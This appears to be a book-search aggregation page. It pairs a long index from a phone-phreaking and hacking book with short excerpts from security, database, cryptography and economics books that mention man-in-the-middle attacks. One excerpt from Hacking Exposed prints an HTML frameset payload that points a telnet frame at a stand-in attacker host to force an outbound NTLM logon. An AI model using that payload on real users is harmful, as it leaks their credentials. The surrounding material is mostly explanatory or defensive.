M M15 emulation, 392 Ma Bell diverters, 60–62 divesture, 82–85 early phreak days, 44–45 friends in high places story, 55–56 getting into central office, 52–55 introducing competition to, 62–63, 68 operators, 47–48 overview, 44 small-time rural phone companies, 55–56 step offices, 49–52 surveying COSMOS, 59–60 switching centers, 45–46 teleconferencing story, 11–12 tragic side of breakup, 71–73 MAC addresses, 741, 743 MacNeil-Lehrer Report, 189 MAEs (Metropolitan Area Ethernets), 304–305 mail systems ARPANET, 148 BITNET, 149 CSNet, 149 Mailnet, 149 MCI Mail, 159–161 networks sharing RFC822 electronic, 152–153 UUCP network, 149, 152 Mailnet, 149–151 mains powered transmitters, 354 malls, hackers in, 512–514 Manhattan Project, 5–7 man-in-the-middle attacks (MITMs), WiFi, 744–746 manuals, exploring cell phones, 425 MapQuest, 638 Marine law enforcement agencies, 620–623 marine telephone fraud, 423–424 Market Navigation, 81 MARK-facer canceler, USPS, 373–374, 376–377 marking methods, viruses, 291 Markoff, John lies of, 249–250, 252 as portrayed in The Fugitive Game, 246–247 stories about Kevin Mitnick, 529 Marshall, General, 4–5 MasterCard, 113 Masters of Deception (Quittner), 559 Masters of Deception (Slatalla and Quittner), 239–242 Master/Session key management, 709–710 Maxfield, John, 184 McAfee, John, 290–293 McAfee Associates, 292 McGruder, Aaron, 593 MCI (Microwave Communications Inc) 800-FRIENDS update service, 464 access code, 94 challenging Bell monopoly, 83 dishonest tactics of, 168–170 features of, 68–69 Friends and Family Circle gimmick, 463–464 long-distance fraud lawsuits of, 114 multi-carrier toll abuse and, 222–223 in nineties, 463–464 no method for finding codes, 68 overview of, 67–68 MCI Mail, 158–161, 170 MCI Worldcom backbone provider, 303 MCI.NET, 303 McKinney, Gene, 622 MD-5 cryptography, 312 media, in 1990s, 256–265 guiding perceptions about hackers, 256–258 hitting big time, 258–261 investigation and reporting, 261–265 mega-mergers, telephone, 482 Melissa virus, 581 MEM (MetroCard Express Machine), 785, 787–789 memory, in brain, 824–825 memory, increasing pager, 345 MEPS (Military Entry Processing Station), 628 Mercedes Benz, hacking, 772 MESSAGE CENTER voice mail, 473–474 Message Transfer Part (MTP) packets, 432 messages, pager. see pagers MetroCard Express Machine (MEM), 785, 787–789 MetroCard Vending Machine (MVM), 785, 787–789 MetroCards decoding Dual-Track - Track 1-2, 792–794 decoding Dual-Track - Track 3, 791–792 reading, 790 swiping on turnstile, 789 system of, 787–788 terminology, 785–786 Metrofone, 66–69 800 numbers, 92 Metropolitan Area Ethernets (MAEs), 304–305 Metropolitan Transportation Authority (MTA), 785 MF (multifrequency) tones blue boxes, 24 for cellular telephones, 105 history of blue boxing, 28–29 in-band signaling principles, 28 Michigan loops, 12–13 microphones coaxial cable, 352 contact, 350–351 hidden-wire line, 351 with in-line amplifier, 351 parabolic, 350 piezoelectric coaxial, 357 shotgun, 350 spike, 351 telephone line, 352 tube, 351 Microsoft Outlook security weakness, 581 microwaves cellular telephones, 87 long-distance, 67 toll pass systems, 328 military consequences of hacking into, 301–302 experiences as paid hacker for, 405–408 Fortezza project, 310–312 military and war zone hacking stories, 618–630 backdoor exits from U.S.
…
Military, 627–628 circumventing DOD’s SmartFilter, 628–630 getting busted, 619–625 hacker goes to Iraq, 618–619 Military Entry Processing Station (MEPS), 628 Miller, Johnny Lee, 243–245 MILNET, 145–146 MIN (Mobile Identification Number) Cellemetry service, 436–437 cellular fraud and, 98, 479 NAM chip containing, 106 programming CMT, 107 roaming, 108 safe cellular phreaking using, 103 miniature tape recorders, 361–362 MINIX operating system, 392–396 Miramax, Takedown screenplay, 249–256 MISSI (Multilevel Information Systems Security Initiative), 310–312 MITMs (man-in-the-middle attacks), WiFi, 744–746 Mitnick, Kevin conditional freedom of, 564, 586–587 on doing time, 586 facts in, 523 false charges against, 528–529 forced to accept plea agreement, 538, 547–550 “Free Kevin” campaign, 252–253, 255–256 how this can happen, 544–546 imprisonment of, 526 indictment against, 531 media guiding perception of, 257–258 as portrayed in Cyberpunk , 235–238, 246 as portrayed in The Fugitive Game, 246–247 psychological and physical torture of, 569 punishment far outweighing crime, 534–535, 544–546 raid on, 202–203 as role model for overcoming adversity, 597 Takedown screenplay and, 249–252, 254–256 testifying before Senate about hackers, 580 what was lost, 575–576 MLOCR (Multiline Optical Character Reader), 375–377 Mobile Identification Number. see MIN (Mobile Identification Number) Mobile Station Integrated Services Digital Network (MSISDN) number, 429–430, 433–434 Mobile Station Roaming Number (MSRN), GSM, 433–434 Mobile Switching Center (MSC), GSM, 431–434 Mobile Telephone Switching Office. see MTSO (Mobile Telephone Switching Office) mobile telephones. see cellular phones Mobile Top Up phone card, Afghanistan, 659 MOD, 525, 527–528 Modern Biology, Inc., 822–823 modulation transmitters, advanced, 355 Monsanto’s Roundup Ready crops, 821 Morris, Robert T., 155–156, 235 Morse Code, 368–369 MOSAIC project, 310 Motion Picture Association of America. 
see MPAA (Motion Picture Association of America) Motorola, 363 motors, surveillance tape recorders, 361 MPAA (Motion Picture Association of America) DeCSS code and, 574 DeCSS trial verdict, 587–591 lawsuit against 2600 and others, 576–577 opposition to motions of, 583 people realizing true motives of, 591, 593 MSC (Mobile Switching Center), GSM, 431–434 MSISDN (Mobile Station Integrated Services Digital Network) number, 429–430, 433–434 MSRN (Mobile Station Roaming Number), GSM, 433–434 MTA (Metropolitan Transportation Authority), 785 MTP (Message Transfer Part) packets, 432 MTSO (Mobile Telephone Switching Office) checking valid cellular call number, 98 how cell phones work, 86 recognizing access codes, 106 roaming, 108 safe cellular phreaking and, 103 multi-carrier toll abuse, 222–223 multifrequency tones. see MF (multifrequency) tones Multilevel Information Systems Security Initiative (MISSI), 310–312 multiline dial-out slave infinity device, 359 Multiline Optical Character Reader (MLOCR), 377 multiplexing, GSM phones, 431–432 multitrack recording, surveillance tape recorders, 362 muting mouthpiece, COCOTs, 452 MVM (MetroCard Vending Machine), 785, 787–789 MW/MHWMWNC (Wall Mount Enclosures), 608 Mykotronx, Inc., 312 N Nagra Magnetic Recorders, Inc., 362 NAM (Number Assignment Module) programming CMT, 107 safe cellular phreaking and, 103 security of, 106 named exchanges, 484–486 NAPs, system of, 304–305 Napster, 581–582 narrow band transmitters, 356 National Assembly of Hackers, 249 National Biometrics Test Center, 811 National Direct Dial (NDD) code, Afghan phone system, 658 National RNZ 36, 362 National Science Foundation Network (Nsfnet), 152 National Security Agency.
see NSA (National Security Agency) National Semiconductor, Fortezza cards, 312 national signaling systems, 470–472 NATO allies, AUTOVON tied to, 31 Naval Intelligence, lobbying for Digital Telephony Bill, 561 Navy law enforcement agencies, 620–623 NCR ATMs, hacking, 765–768 NDD (National Direct Dial) code, Afghan phone system, 658 near infrared technology, vehicles, 329 Nedap voting machine, 807–808 Neidorf, Craig. see Lightning, Knight (Craig Neidorf) neighborhood security gates, 419–420 neighbors’ networks, hacking, 739–743 net, early days. see Internet, early days of Netcom, Kevin Mitnick case, 528–529 NetNorth, 152 NetStumbler, 734 network code, identifying GSM provider, 429 Network Processor. see NP (Network Processor) Network Solutions, 583 Network-Based ALI, 681–682 network-layer encryption, wireless networks, 737 networks beginning of Internet, 148–151 hacking paging, 345–349 Internet, 303 reading addresses, 153–155 Worldnet, 151–153 Neuromancer (Gibson), 235 New York City Transit Authority (NYCTA), 785 New York Telephone/NYNEX. 
see NYNEX/New York Telephone New York’s MTA, 785–794 conclusions, 794–795 Cubic Transportation Systems, 786–787 decoding Dual-Track MetroCards - Track 1-2, 792–794 decoding Dual-Track MetroCards - Track 3, 791–792 MetroCard system, 787–788 overview of, 785 reading MetroCards, 790 receipts, 788–789 terminology, 785–786 turnstiles, 789 vending machines, 788 newsgroups, elite speak in, 816 nmap, 742 non-beaconing, 737 non-judicial punishment, military law, 621 NON-PUBDA#, obtaining from CN/A operator, 48 no-pick option, and equal access, 97 Nortel DMS-MSC, GSM switch, 431 Northern Telecommunications, long-distance services made by, 67 Notepad, 638 Novatel CMTs, 104 NOVRAM chips, 427 NP (Network Processor) CampusWide infrastructure and, 608–609 CampusWide server, 605 conducting simple transaction, 610–611 exploits, 611–612 getting into database through, 606 NPA (area code), pagers, 346 NSA (National Security Agency) Clipper Chip proposal, 556 cryptosystem of, 308 Digital Telephony Bill lobbying of, 561 Fortezza project, 310–312 invasion of citizen privacy, 552 secretive research of, 309–310 Nsfnet (National Science Foundation Network), 152 NTS Connection, MCI affiliation with, 169–170 Number Assignment Module. see NAM (Number Assignment Module) number restriction, COCOTs, 452 numbering system, world phone zones, 467–468 numbers 800, 92–93, 111–112 976 (dial-it) numbers, 62 Automatic Number Identifier, 61 determining hot sets of lottery, 646–648 ESN. see ESN (Electronic Serial Number) MIN. see MIN (Mobile Identification Number) NAM.
see NAM (Number Assignment Module) numbers, COCOT phone call forwarding, 456–457 overview of, 453–454 numbers, stories about, 7–15 overview of, 7 scariest number in world, 8–9 teleconferencing saga, 11–15 truth about 9999, 9–11 Nunn, Senator Sam, 257 NYCTA (New York City Transit Authority), 785 NYCWireless group, 737–738 NYNEX/New York Telephone as Baby Bell, 83 changes to pay phones, 482–483 competing with Ma Bell, 62 exposing, 175–176 mega-mergers, 482 sleazy practices of, 157–158 O @o command, ARPANET, 146–147 OGM (outgoing message), answering machines, 660–662 OLD command, RSTS/E, 128 omnidirectional antennas, radio piracy, 760 OmniMetrix, 436 Omnipoint, 483 OneCard system. see CampusWide system op-diverting, ANI-fails, 665 OpenQubit, 288–289 Openwave, 747–749 Operation Sun Devil bittersweet victory, 501 crackdown, 493–496 hunt intensifies, 496–498 increased restrictions, 498–499 no time for complacency, 500–501 overview of, 492–493 operators Amateur Radio, 367–369 conferencing and, 81 enabling calls to special, 48–49 genesis of, 27 pagers sending out messages via, 341 types of, 47–48 Optim9000. 
see CampusWide system OptoComs, Chrome Box, 324–325 orangeboxing, 666 ORed (XORed) burst period, 432 Orinoco cards, 735 Orion, 436 OSUNY bulletin board, 23 outgoing message (OGM), answering machines, 660–662 out-of-band signaling, 27 overlay codes, 486 P Pacific Bell, wiretapping, 555 Pacific Telesis, 83 packet types, 802.11b, 734 pagefile.sys, 286 pagers, 339–345 decoding setup, 346–349 defined, 340 for free, 101–102 how messages are sent to, 340 how network works, 345–346 message length, 342 other questions, 342–345 sending out messages, 341 types of, 340 PAI (public and international) accounts, Dell, 697, 699 Paketto Keiretsu, 701 PANI (Pseudo-ANI), 665 Pansat 2500A receivers, 763–764 paper clips, as lockpickers, 778 parabolic microphones, 350 ParadisePoker.com blackjack story, 644–646 parallel transmitters, 360 parasitic grids, 737–738 parole eligibility, military, 624–625 party lines, wiring for, 24 Passback Period, New York’s MTA, 786 passive detection, wireless networks, 734–735 passwords, 163 answering machine hacking, 660–662 Answers for Gateway, 730 COSMOS, 59 DEC-20, 124–125 electronic message center, 769 FirstClass, 617 IBM’s Audio Distribution System, 69–71 Internet radio stations, 306 MCI Mail, 160–161 military, 406–408 negative feedback on hacking, 503–504 printing password file, 60 Radio Shack screensaver, 706 RSTS/E, 127–128 Telemail, 122–124 UAPC, 135–136 VMS systems, 130 Watson system at T-Mobile stores, 676 patterns, lottery number, 784 pay phones, 35–43.
see also COCOTs (Customer Owned Coin Operated Telephones) abuse of, 41–43 alternate designs, 38–40 charging for toll-free numbers from, 487 cheese box, 40–41 clear box working on post-pay, 32–33 hacking three holed, 652–655 history of, 36 in the nineties, 482–483 operation logic, 36–37 types of, 39 what happens to your money, 37–38 why redboxing doesn’t work, 446–448 pay TV descramblers, making, 332–333 PayPal, transaction reversals, 725–729 PBX (Private Branch eXchange) digital telephone abuse, 43 electronic pay phones, 39–40 multi-carrier toll abuse, 222–223 teleconferencing dangers, 79 teleconferencing using, 77 PCMCIA card, 310 PCP (PC Pursuit), 141–144, 164–165 PCS (Personal Communications Services), GSM, 428–429 PCs, Kmart, 715 peering, Internet, 302–305 pen registers, 183 Pengo, 235 Pentagon City Mall, 512 People Express, 166–168 Peripheral Interchange Program (PIP), RSTS/E, 128 peripheral nervous system, 826 Personal Communications Services (PCS), GSM, 428–429 personal identification code (PIC), Pronto, 164 Personal Identification Number (PIN), GSM SIM cards, 430 Personal Unblocking Key (PUK), 430 personalized info, XM Radio signal, 755 Pfaelzer, Mariana, 549 PHALSE (Phreakers, Hackers, and Laundromat Service Employees), 525 pharmacy computers, Wal-Mart, 714 phase-locked loop (PLL) transmitter, radio piracy, 759–761 Phiber Optik case, 523, 526–527 philosophy. see hackers, philosophy phone cards, Afghan, 659 phone phreaking, 21st century, 659–680 ANI and Caller ID spoofing, 664–669 answering machine hacking, 659–662 backspoofing, 672–675 feeding the frenzy of Internet threats, 662–663 fun of prosecuting for, 555 getting more from T-Mobile, 675–679 tracking any U.K.
Hacking Exposed: Network Security Secrets and Solutions by Stuart McClure, Joel Scambray, George Kurtz
AltaVista, bash_history, Dennis Ritchie, end-to-end encryption, information security, Ken Thompson, Larry Wall, MITM: man-in-the-middle, Morris worm, Multics, peer-to-peer, remote working, systems thinking, web application
Setting it to Send NTLMv2 Response Only or higher can greatly mitigate the risk from LM/NTLM eavesdropping attacks. (This assumes the continued restricted availability of programs that will extract hashes from NTLMv2 challenge-response traffic.) Rogue server and man-in-the-middle (MITM) attacks against NTLMv2 authentication are still feasible, assuming that the rogue/MITM server can negotiate the NTLMv2 dialect with the server on behalf of the client.

IRC HACKING

Internet Relay Chat (IRC) remains one of the more popular applications on the Internet, driven not only by the instant gratification of real-time communications, but also by the ability to instantaneously exchange files using most modern IRC client software.
…
This also allows an attacker to craft an HTML email message that forces an outbound authentication over any port:

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
</html>

P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:31 AM
ProLib8 / Hacking Exposed: Network Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16
Chapter 16: Hacking the Internet User
Color profile: Generic CMYK printer profile Composite Default screen

Normally, this wouldn’t be such a big deal, except that on Win 2000, the built-in telnet client is set to use NTLM authentication by default. Thus, in response to the preceding HTML, a Win 2000 system will merrily attempt to log on to evil.ip.address using the standard NTLM challenge-response mechanism. This mechanism, as we saw in Chapter 5, can be vulnerable to eavesdropping and man-in-the-middle (MITM) attacks that reveal the victim’s username and password. This attack affects a multitude of HTML parsers and does not rely on any form of Active Scripting, JavaScript or otherwise. Thus, no IE configuration can prevent this behavior. Credit goes to DilDog of Back Orifice fame, who posted this exploit to Bugtraq.
PostgreSQL 9 Admin Cookbook: Over 80 Recipes to Help You Run an Efficient PostgreSQL 9. 0 Database by Simon Riggs, Hannu Krosing
business intelligence, business process, database schema, Debian, en.wikipedia.org, full text search, GnuPG, MITM: man-in-the-middle, Skype
SSL mode | Eavesdropping protection | MITM protection | Statement
verify-ca | Yes | Depends on CA-policy | I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server that I trust.
verify-full | Yes | Yes | I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server I trust, and that it's the one I specify.

The MITM in the preceding table means Man-In-The-Middle attack, that is, someone posing as your server, but actually just observing and forwarding the traffic.

Checking server authenticity

The last two SSL modes allow you to be reasonably sure that you are actually talking to your server, by checking the SSL certificate presented by the server.
…
The following commands generate a self-signed certificate for your server:

openssl genrsa 1024 > server.key
openssl req -new -x509 -key server.key -out server.crt

Read more on x509 keys and certificates in openSSL's HowTo pages at the following website: http://www.openssl.org/docs/HOWTO/

Setting up a client to use SSL

Client behavior is controlled by an environment variable, PGSSLMODE, that can have the following values, as defined in the official PostgreSQL documents:

SSL mode | Eavesdropping protection | MITM protection | Statement
disabled | No | No | I don't care about security, and I don't want to pay the overhead of encryption.
allow | Maybe | No | I don't care about security, but I will pay the overhead of encryption if the server insists on it.
prefer | Maybe | No | I don't care about encryption, but I wish to pay the overhead of encryption if the server supports it.
Click Here to Kill Everybody: Security and Survival in a Hyper-Connected World by Bruce Schneier
23andMe, 3D printing, air gap, algorithmic bias, autonomous vehicles, barriers to entry, Big Tech, bitcoin, blockchain, Brian Krebs, business process, Citizen Lab, cloud computing, cognitive bias, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, cuban missile crisis, Daniel Kahneman / Amos Tversky, David Heinemeier Hansson, disinformation, Donald Trump, driverless car, drone strike, Edward Snowden, Elon Musk, end-to-end encryption, fault tolerance, Firefox, Flash crash, George Akerlof, incognito mode, industrial robot, information asymmetry, information security, Internet of things, invention of radio, job automation, job satisfaction, John Gilmore, John Markoff, Kevin Kelly, license plate recognition, loose coupling, market design, medical malpractice, Minecraft, MITM: man-in-the-middle, move fast and break things, national security letter, Network effects, Nick Bostrom, NSO Group, pattern recognition, precautionary principle, printed gun, profit maximization, Ralph Nader, RAND corporation, ransomware, real-name policy, Rodney Brooks, Ross Ulbricht, security theater, self-driving car, Seymour Hersh, Shoshana Zuboff, Silicon Valley, smart cities, smart transportation, Snapchat, sparse data, Stanislav Petrov, Stephen Hawking, Stuxnet, supply-chain attack, surveillance capitalism, The Market for Lemons, Timothy McVeigh, too big to fail, Uber for X, Unsafe at Any Speed, uranium enrichment, Valery Gerasimov, Wayback Machine, web application, WikiLeaks, Yochai Benkler, zero day
Nathaniel Popper (21 Aug 2017), “Identity thieves hijack cellphone accounts to go after virtual currency,” New York Times, https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html.
49 This is called a man-in-the-middle attack: Rapid7 (9 Aug 2017), “Man-in-the-middle (MITM) attacks,” Rapid7 Fundamentals, https://www.rapid7.com/fundamentals/man-in-the-middle-attacks.
49 A credit card issuer might flag: Gartner (accessed 24 Apr 2018), “Reviews for online fraud detection,” https://www.gartner.com/reviews/market/Online Fraud DetectionSystems.
50 This was one of the techniques: David Kushner (26 Feb 2013), “The real story of Stuxnet,” IEEE Spectrum, https://spectrum.ieee.org/telecom/security/the-real-story-of-stuxnet.
50 For years, though, hackers have been: Dan Goodin (3 Nov 2017), “Stuxnet-style code signing is more widespread than anyone thought,” Ars Technica, https://arstechnica.com/information-technology/2017/11/evasive-code-signed-malware-flourished-before-stuxnet-and-still-does.
…
Sharon Goldberg (22 Jun 2017), “Surveillance without borders: The ‘traffic shaping’ loophole and why it matters,” Century Foundation, https://tcf.org/content/report/surveillance-without-borders-the-traffic-shaping-loophole-and-why-it-matters.
22 In 2013, one company reported: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking.
22 In 2014, the Turkish government: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking.
22 In 2017, traffic to and from: Dan Goodin (13 Dec 2017), “‘Suspicious’ event routes traffic for big-name sites through Russia,” Ars Technica, https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia.
22 a 2008 talk at the DefCon hackers conference: Dan Goodin (27 Aug 2008), “Hijacking huge chunks of the internet: A new How To,” Register, https://www.theregister.co.uk/2008/08/27/bgp_exploit_revealed.
23 “It’s not that we didn’t think about security”: Craig Timberg (30 May 2015), “A flaw in the design,” Washington Post, http://www.washingtonpost.com/sf/business/2015/05/30/net-of-insecurity-part-1.
23 “It is highly desirable that Internet carriers”: Brian E.
…
In a nutshell, he said that zero-day vulnerabilities are overrated, and credential stealing is how he gets into networks. He’s right. As bad as software vulnerabilities are, the most common way hackers break into networks is by abusing the authentication process. They steal passwords, set up man-in-the-middle attacks to piggyback on legitimate log-ins, or masquerade as authorized users. Credential stealing doesn’t require finding a zero-day or an unpatched vulnerability, plus there’s less chance of discovery, and it gives the attacker more flexibility in technique. This isn’t just true for the NSA; it’s true for all attackers.
The Blockchain Alternative: Rethinking Macroeconomic Policy and Economic Theory by Kariappa Bheemaiah
"World Economic Forum" Davos, accounting loophole / creative accounting, Ada Lovelace, Adam Curtis, Airbnb, Alan Greenspan, algorithmic trading, asset allocation, autonomous vehicles, balance sheet recession, bank run, banks create money, Basel III, basic income, behavioural economics, Ben Bernanke: helicopter money, bitcoin, Bletchley Park, blockchain, Bretton Woods, Brexit referendum, business cycle, business process, call centre, capital controls, Capital in the Twenty-First Century by Thomas Piketty, cashless society, cellular automata, central bank independence, Charles Babbage, Claude Shannon: information theory, cloud computing, cognitive dissonance, collateralized debt obligation, commoditize, complexity theory, constrained optimization, corporate governance, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, cross-border payments, crowdsourcing, cryptocurrency, data science, David Graeber, deep learning, deskilling, Diane Coyle, discrete time, disruptive innovation, distributed ledger, diversification, double entry bookkeeping, Ethereum, ethereum blockchain, fiat currency, financial engineering, financial innovation, financial intermediation, Flash crash, floating exchange rates, Fractional reserve banking, full employment, George Akerlof, Glass-Steagall Act, Higgs boson, illegal immigration, income inequality, income per capita, inflation targeting, information asymmetry, interest rate derivative, inventory management, invisible hand, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Joseph Schumpeter, junk bonds, Kenneth Arrow, Kenneth Rogoff, Kevin Kelly, knowledge economy, large denomination, Large Hadron Collider, Lewis Mumford, liquidity trap, London Whale, low interest rates, low skilled workers, M-Pesa, machine readable, Marc Andreessen, market bubble, market fundamentalism, Mexican peso crisis / tequila crisis, Michael Milken, MITM: man-in-the-middle, Money creation, 
money market fund, money: store of value / unit of account / medium of exchange, mortgage debt, natural language processing, Network effects, new economy, Nikolai Kondratiev, offshore financial centre, packet switching, Pareto efficiency, pattern recognition, peer-to-peer lending, Ponzi scheme, power law, precariat, pre–internet, price mechanism, price stability, private sector deleveraging, profit maximization, QR code, quantitative easing, quantitative trading / quantitative finance, Ray Kurzweil, Real Time Gross Settlement, rent control, rent-seeking, robo advisor, Satoshi Nakamoto, Satyajit Das, Savings and loan crisis, savings glut, seigniorage, seminal paper, Silicon Valley, Skype, smart contracts, software as a service, software is eating the world, speech recognition, statistical model, Stephen Hawking, Stuart Kauffman, supply-chain management, technology bubble, The Chicago School, The Future of Employment, The Great Moderation, the market place, The Nature of the Firm, the payments system, the scientific method, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, too big to fail, trade liberalization, transaction costs, Turing machine, Turing test, universal basic income, Vitalik Buterin, Von Neumann architecture, Washington Consensus
The system uses cryptographic signatures in place of server-side password storage, thus solving a common security problem[30] for IT administrators (Cawrey, 2014). BitAuth uses Bitcoin’s technology to create a public-private key pair using secp256k1. By providing the user with a system identification number (SIN) that is a hash of the public key, it allows for password-less authentication across web services. It uses signage to prevent man-in-the-middle (MITM) attacks, and a nonce to prevent replay attacks (Raval, 2016). The private key is never revealed to the server and can be stored safely and securely. Identity is decentralized, so instead of having to trust a third party to store identity, a user can store it themselves. The OpenID protocol, developed by the OpenID Foundation, is also pioneering this concept.
…
relative industry shares risk innovation CDOs, CLOs and CDSs non-financial firms originate, repackage and sell model originate-to-distribute model originate-to-hold model principal component production and exchange sharding Blockchain FinTech transformation global Fintech financing activity private sector skeleton keys AI-led high frequency trading amalgamation Blockchain fragmentation process information asymmetries Kabbage KYC/AML procedures KYC process machine learning P2P lending sector payments and remittances sector physical barriers rehypothecation robo-advisors SWIFT and ACH transferwise solution pathways digital identity and KYC private and public utilization scalability TBTF See Too Big to Fail (TBTF) television advertisement Financialization See Fragmentation Financial Stability Oversight Committee (FSOC) Financial system Financial Technology (FinTech) capital markets Carney, Mark CHIPS financial services financing activities history insurance sector investment/wealth management lending platforms payments Foreign direct investment (FDI) Fractional Reserve banking base and broad money capital requirements central banks commercial banks exchanging currency fractional banking governments monetary policies monetary policy objectives Tier 1, Tier 2, and Tier 3 capital value of a currency Fragmentation concept of current economic malaise dial-up Internet access evolutionary biology Haldane, Andy information asymmetry limitations problem-solving approaches regulatory-centric approach systemic risk TBTF US telecoms industry G Genetic algorithm (GA) Gramm-Leach-Bliley Financial Modernization Act Greenspan, Alan Gresham’s law Guardtime H Haldane, Andy Heterogeneous interacting agents High-frequency trading (HFT) Human uncertainty principle HYPR I Implicit contracts Information and communication technologies (ICTs) Institute for New Economical Thinking (INET) Insurance sector InterLedger Protocol (ILP) Internal Revenue Service (IRS) iSignthis J Junk bonds K
Kashkari, Neel Kelton, Stephanie Kim-Markowitz Portfolio Insurers Model Know Your Business (KYB) Know Your Customer (KYC) advantage Atlantic model concept of contextual scenario development of documents empirical approach Government digital identity programs identity identity and KYC/AML services Kabbage KYC-Chain manifestations merchant processor multidimensional attributes multiple sources Namecoin blockchain OpenID protocol procedural system regulatory institutions tokenized identity transactional systems value exchange platforms vast-ranging subject Zooko’s triangle kompany.com L Large hadron collider (LHC) Living Will Review process M Macroeconomic models types cellular automata (CA) equilibrium business-cycle models genetic algorithm (GA) neural networks rational expectations structural models traditional structural models vector autoregression (VAR) models Macroeconomic theories Man-in-the-middle (MITM) Marketing money cashless system crime and taxation economy IRS money Seigniorage tax evasion Mathematical game theory McFadden Act Mincome, Canada Minority Game (MG) Money and debt See also Debt and money capitalism cash obsession CRS report currencies floating exchange functions gold and silver history of money history real commodities transfer of types of withdrawn shadow banking See Shadow banking and systemic risk utilitarian approach Multiple currencies Bitcoin Obituaries bitcoin price BTC/USD and USD/EUR volatility contractual money cryptocurrencies differences free banking Gresham’s law legal definition legal status private and government fiat private money quantitative model sovereign cash volatility N Namecoin blockchain Namibia Natural Language Processing (NLP) NemID Neo-Keynesian models Neuroplasticity New Keynesian models (NK models) O Occupational Information Network (ONET) Office of Scientific Research and Development (OSRD) OpenID protocol Originate, repackage and sell model Originate-to-distribute model P Paine, Thomas Palley, Thomas I.
The Art of Invisibility: The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data by Kevin Mitnick, Mikko Hypponen, Robert Vamosi
4chan, big-box store, bitcoin, Bletchley Park, blockchain, connected car, crowdsourcing, data science, Edward Snowden, en.wikipedia.org, end-to-end encryption, evil maid attack, Firefox, Google Chrome, Google Earth, incognito mode, information security, Internet of things, Kickstarter, Laura Poitras, license plate recognition, Mark Zuckerberg, MITM: man-in-the-middle, off-the-grid, operational security, pattern recognition, ransomware, Ross Ulbricht, Salesforce, self-driving car, Silicon Valley, Skype, Snapchat, speech recognition, Tesla Model S, web application, WikiLeaks, zero day, Zimmermann PGP
Girls send, on average, about 3,952 text messages per month, and boys send closer to 2,815 text messages per month, according to the study.[12] The good news is that today all the popular messaging apps provide some form of encryption when sending and receiving your texts—that is, they protect what’s called “data in motion.” The bad news is that not all the encryption being used is strong. In 2014, researcher Paul Jauregui of the security firm Praetorian found that it was possible to circumvent the encryption used by WhatsApp and engage in a man-in-the-middle (MitM) attack, in which the attacker intercepts messages between the victim and his recipient and is able to see every message. “This is the kind of stuff the NSA would love,” Jauregui observed.[13] As of this writing, the encryption used in WhatsApp has been updated and uses end-to-end encryption on both iOS and Android devices.
…
Because I’m sitting in the middle of the interaction between the victim and the website, I can inject JavaScript and cause fake Adobe updates to pop up on his or her screen, which, if installed will infect the victim’s computer with malware. The purpose is usually to trick you into installing the fake update to gain control of your computer. When the guy at the corner table is influencing the Internet traffic, that’s called a man-in-the-middle attack. The attacker is proxying your packets through to the real site, but intercepting or injecting data along the way. Knowing that you could unintentionally connect to a shady Wi-Fi access point, how can you prevent it? On a laptop the device will go through the process of searching for a preferred wireless network and then connect to it.
…
The argument in favor of keeping the TV in listening mode is that the device needs to hear any additional commands you might give it, such as “Volume up,” “Change the channel,” and “Mute the sound.” That might be okay, except the captured voice commands go up to a satellite before they come back down again. And because the entire string of data is not encrypted, I can carry out a man-in-the-middle attack on your TV, inserting my own commands to change your channel, pump up your volume, or simply turn off the TV whenever I want. Let’s think about that for a second. That means if you’re in a room with a voice-activated TV, in the middle of a conversation with someone, and you decide to turn on the TV, the stream of conversation that follows may be recorded by your digital TV.
Multitool Linux: Practical Uses for Open Source Software by Michael Schwarz, Jeremy Anderson, Peter Curtis
business process, Debian, defense in depth, Free Software Foundation, GnuPG, index card, indoor plumbing, Larry Ellison, Larry Wall, MITM: man-in-the-middle, optical character recognition, PalmPilot, publish or perish, RFC: Request For Comment, Richard Stallman, seminal paper, SETI@home, slashdot, the Cathedral and the Bazaar, two and twenty, web application
Danger, Will Robinson! Danger! Harken back, if you will, to Chapter 10. Once again, you are dealing with cryptographic keys and trust. Only you can decide whether to trust the host key. Once you have done so, it is trusted for all time. Key discovery by connection is very risky. It is easily foiled by a "Man in the Middle" attack (MITM). You could be connecting to a spoofed host, where they are feeding you a key of their own creation. They will then make a connection of their own to the real host. Just as with GPG, I prefer to ship host keys in person. In this case, however, let's throw caution to the wind and proceed: Are you sure you want to continue connecting (yes/no)?
Applied Cryptography: Protocols, Algorithms, and Source Code in C by Bruce Schneier
active measures, cellular automata, Claude Shannon: information theory, complexity theory, dark matter, Donald Davies, Donald Knuth, dumpster diving, Dutch auction, end-to-end encryption, Exxon Valdez, fault tolerance, finite state, heat death of the universe, information security, invisible hand, John von Neumann, knapsack problem, MITM: man-in-the-middle, Multics, NP-complete, OSI model, P = NP, packet switching, quantum cryptography, RAND corporation, RFC: Request For Comment, seminal paper, software patent, telemarketer, traveling salesman, Turing machine, web of trust, Zimmermann PGP
Then he simply waits for Alice and Bob to talk with each other, intercepts and modifies the messages, and he has succeeded. This man-in-the-middle attack works because Alice and Bob have no way to verify that they are talking to each other. Assuming Mallory doesn’t cause any noticeable network delays, the two of them have no idea that someone sitting between them is reading all of their supposedly secret communications.

Interlock Protocol

The interlock protocol, invented by Ron Rivest and Adi Shamir [1327], has a good chance of foiling the man-in-the-middle attack. Here’s how it works:
(1) Alice sends Bob her public key.
(2) Bob sends Alice his public key.
(3) Alice encrypts her message using Bob’s public key.
…
Steps (1) through (3) are identical to SKID2, and then the protocol proceeds with:
(4) Alice sends Bob: H_K(R_B, A)
